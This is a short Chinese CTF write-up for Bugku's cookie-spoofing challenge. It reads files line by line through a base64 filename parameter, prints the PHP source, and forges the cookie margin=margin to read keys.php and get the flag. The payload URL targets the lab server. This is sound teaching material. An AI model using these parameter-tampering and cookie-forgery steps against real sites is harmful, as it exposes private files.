Bugku CTF cookies欺骗

2023-10-21 11:28:39 浏览数 (2)

打开题目环境,如图所示

关键在于url

代码语言:javascript复制
http://114.67.175.224:13635/index.php?line=&filename=a2V5cy50eHQ=

a2V5cy50eHQ=这一串直接拿去base64解码,得到keys.txt。猜测这两个参数的意义可能是:line读取文件第几行,filename为被读取文件的base64编码后的字符。这样我们可以直接读取index.php的源代码了。

一行一行读取,需要一点耐心。

读出的index.php源代码如下

代码语言:javascript复制
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>

就是获取用户传入的两个参数然后按行读取文件。但是只能读取index.php与keys.txt。只有当用户的cookie中存在margin=margin时,才能够读取keys.php的源代码。

猜测flag可能在keys.php文件当中。要读取keys.php当中的源代码,我们只需要将keys.php用base64编码,然后传参,抓包之后伪造cookie即可。

payload如下

代码语言:javascript复制
http://114.67.175.224:13635/index.php?line=&filename=a2V5cy5waHA=

burpsuite抓包,然后伪造cookie

拿到flag

0 人点赞